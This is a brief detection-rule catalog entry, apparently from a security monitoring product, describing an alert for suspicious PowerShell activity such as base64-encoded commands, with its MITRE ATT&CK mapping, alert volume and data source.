Suspicious Powershell Activity

Description

Triggered when a possible malicious powershell command is executed. This anomaly contains detection methods that inspect endpoint and Windows event logs looking for suspicious commands (e.g., base64 encoded powershell commands).

Content Mapping

This content is not mapped to any local saved search. Add mapping


Use Case

Advanced Threat Detection, Security Monitoring

Category

Endpoint Compromise, Lateral Movement

Alert Volume

Medium

Journey

Stage 6

MITRE ATT&CK Tactics

Execution

MITRE ATT&CK Techniques

PowerShell

Data Sources

Windows Security